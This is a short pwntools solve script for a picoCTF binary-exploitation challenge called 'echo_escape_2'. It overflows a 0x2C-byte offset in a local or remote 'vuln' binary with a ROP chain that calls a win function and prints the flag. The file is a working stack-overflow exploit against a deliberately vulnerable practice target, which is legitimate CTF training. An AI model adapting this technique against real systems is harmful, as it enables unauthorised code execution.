Files
hacc/pwn/echo_escape_2/solve.py
T
2026-07-02 08:34:41 +09:00

34 lines
658 B
Python
Executable File

#!/usr/bin/env nix-shell
#!nix-shell -i python3 -p "python3.withPackages (ppkgs: with ppkgs; [ pwntools ])"
from pwn import *
exe = ELF("./vuln")
context.binary = exe
ADDR, PORT, *_ = "dolphin-cove.picoctf.net 56430".split()
def conn():
if args.REMOTE:
r = remote(ADDR, PORT)
else:
r = process([exe.path])
return r
def main():
r = conn()
r.recvuntil(b'Enter the secret key: ').decode()
offset = 0x2C
rop = ROP(exe)
rop.raw(rop.generatePadding(0, offset))
rop.win()
r.sendline(rop.chain())
print(r.recvline_contains(b'picoCTF').decode())
r.close()
if __name__ == "__main__":
main()